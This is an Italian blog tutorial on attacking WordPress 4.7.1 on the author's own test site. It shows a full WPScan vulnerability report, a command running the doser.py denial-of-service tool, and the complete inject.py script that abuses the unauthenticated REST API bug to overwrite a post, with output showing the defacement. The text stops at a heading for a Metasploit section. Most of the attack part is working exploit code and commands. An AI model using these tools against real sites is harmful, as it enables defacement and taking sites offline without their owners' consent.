CHIT – Linux, Sicurezza, WordPress, Ethical Hacking, Penetration Testing…

  • About
  • Contatta CHIT

Hacking WordPress – Content Injection Exploit e DoS

Mag27
on 27 Maggio 2019 at 15:30
Posted In: Ethical Hacking / Penetration Testing, Sicurezza / Anonimato, WordPress

In questo esempio si andranno ad “exploitare” alcune vulnerabilità della versione 4.7.1 di WordPress. Per prima cosa scansionare il sito alla ricerca di vulnerabilità con WPScan.

Rilevare vulnerabilità in WordPress con WPScan

workstation:/home/chit # wpscan --url http://chit-test.ch
WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://chit-test.ch/
[+] Started: Wed May 22 18:07:18 2019

Interesting Finding(s):

[+] http://chit-test.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 4.7.1 identified (Insecure, released on 2017-01-11).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://chit-test.ch/?feed=rss2, https://wordpress.org/?v=4.7.1
 |  - http://chit-test.ch/?feed=comments-rss2, https://wordpress.org/?v=4.7.1
 |
 | [!] 44 vulnerabilities identified:
 |
 | [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8729
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
 |      - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
 |      - https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
 |
 | [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8730
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
 |      - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
 |      - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
 |
 | [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8731
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
 |      - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
 |      - https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
 |
 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8734
 |      - https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
 |      - https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
 |      - https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
 |      - https://github.com/WordPress/WordPress/commit/e357195ce303017d517aff944644a7a1232926f7
 |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_content_injection
 |
 | [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8765
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
 |      - https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
 |      - http://seclists.org/oss-sec/2017/q1/563
 |
 | [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8766
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
 |
 | [!] Title: WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8767
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6816
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/4d80f8b3e1b00a3edcee0774dc9c2f4c78f9e663
 |
 | [!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8768
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
 |      - https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
 |
 | [!] Title: WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8769
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6818
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/9092fd01e1f452f37c313d38b18f9fe6907541f9
 |
 | [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
 |     Fixed in: 4.7.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8770
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
 |      - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
 |      - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
 |      - http://seclists.org/oss-sec/2017/q1/562
 |      - https://hackerone.com/reports/153093
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8815
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
 |      - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |
 | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8816
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
 |
 | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks 
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8817
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
 |
 | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8818
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
 |      - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
 |
 | [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8819
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
 |      - https://hackerone.com/reports/203515
 |      - https://hackerone.com/reports/203515
 |
 | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8820
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8906
 |      - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://wpvulndb.com/vulnerabilities/8905
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |
 | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer 
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41397
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.7.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.7.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentyseventeen
 | Location: http://chit-test.ch/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://chit-test.ch/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://chit-test.ch/wp-content/themes/twentyseventeen/style.css?ver=4.7.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://chit-test.ch/wp-content/themes/twentyseventeen/style.css?ver=4.7.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins

[i] No plugins Found.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <====================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Finished: Wed May 22 18:07:21 2019
[+] Requests Done: 70
[+] Cached Requests: 4
[+] Data Sent: 10.706 KB
[+] Data Received: 23.486 MB
[+] Memory used: 72.094 MB
[+] Elapsed time: 00:00:02
workstation:/home/chit #

Come si può vedere dal risultato WPScan ha rilevato 44 vulnerabilità.

WordPress Application Denial of Service (DoS)

Diamo ora un occhiata a una vulnerabilità trovata da WPScan, un attacco DoS contro l’applicazione (WordPress).

 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html

Con questo tipo di attacco DoS basterebbe un singolo “attacker” per rendere irraggiungibile il sito cosa che normalmente si ottiene con un attacco DDoS in cui l’attacco proviene da diversi host alla volta.

Come si può vedere WPScan fornisce sempre link molto utili sulle vulnerabilità trovate.

Per più informazioni riguardo a questa vulnerabilità dare un occhiata al seguente link fornito da WPScan: https://thehackernews.com/2018/02/wordpress-dos-exploit.html.

Per testare questo tipo di attacco scaricare il programma doser.py dal seguente link che troviamo tra le informazioni fornite da WPScan: https://github.com/quitten/doser.py.

Una volta scaricato il programma eseguirlo come segue:

user@workstation:~/Programmi/doser.py-master> python doser.py -t 999 -g http://chit-test.ch

WordPress Hacking - DoS Attack

Unauthenticated Page/Post Content Modification via REST API

Con questo exploit è possibile modificare il contenuto (content injection) degli articoli del Blog WordPress preso di mira.

Per più informazioni visitare anche: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.

 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
 |     Fixed in: 4.7.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8734
 |      - https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
 |      - https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
 |      - https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
 |      - https://github.com/WordPress/WordPress/commit/e357195ce303017d517aff944644a7a1232926f7
 |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_content_injection

WordPress 4.7.0-1 Content Injection Exploit – Inject.py

Per exploitare” questa vulnerabilità scaricare inject.py dal link fornito da WPScan: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab o creare il file e copiare e inserire il codice.

Creare un file di testo con Vi eseguendo il seguente comando.

user@workstation:~> vi inject.py

Copiare il codice sottostante e incollarlo per poi salvare e uscire.

# 2017 - @leonjza
#
# WordPress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
#  - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!

import json
import sys
import urllib2

from lxml import etree


def get_api_url(wordpress_url):
    response = urllib2.urlopen(wordpress_url)

    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]

    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')

    return u


def get_posts(api_base):
    respone = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(respone.read())

    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })

    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()

    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))


def print_usage():
    print('Usage: {0}  (optional:  )'.format(__file__))


if __name__ == '__main__':

    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)

    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)

    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {0}'.format(api_url))

    # if we only have a url, show the posts we have have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)

        sys.exit(0)

    # if we get here, we have what we need to update a post!
    print('* Updating post {0}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()

    update_post(api_url, sys.argv[2], ''.join(new_content))

print('* Update complete!')

Una volta creato o scaricato il file eseguirlo come segue:

user@workstation:~> python inject.py 
Usage: inject.py <url> (optional: <post_id> <file with post_content>)
user@workstation:~>

Se si esegue inject.py senza argomenti il programma ci mostrerà informazioni sul suo utilizzo.

user@workstation:~> python inject.py http://chit-test.ch
* Discovering API Endpoint
* API lives at: http://chit-test.ch/wp-json/
* Getting available posts
 - Post ID: 1, Title: Ciao mondo!, Url: http://chit-test.ch/ciao-mondo/
user@workstation:~>

Se si esegue inject.py con solo la URL il programma ci mostra una lista di articoli presenti con ID, utile se non si dovesse essere a conoscenza dell’ID dell’articolo che si vuole modificare.

Una volta a conoscenza dell’ID preparare il file di testo che contiene il testo che si vuole usare per la modifica dell’articolo.

user@workstation:~> vi content

Inserire il testo che si vuole usare nel file – in questo esempio: Sei stato hackerato, aggiorna WordPress! -, salvare ed uscire.

Ora eseguire inject.py con l’ID dell’articolo e il file di testo appena creato.

user@workstation:~> python inject.py http://chit-test.ch 1 content
* Discovering API Endpoint
* API lives at: http://chit-test.ch/wp-json/
* Updating post 1
* Post updated. Check it out at http://chit-test.ch/ciao-mondo/
* Update complete!
user@workstation:~>

WordPress REST API Content Injection Exploit con Metsploit

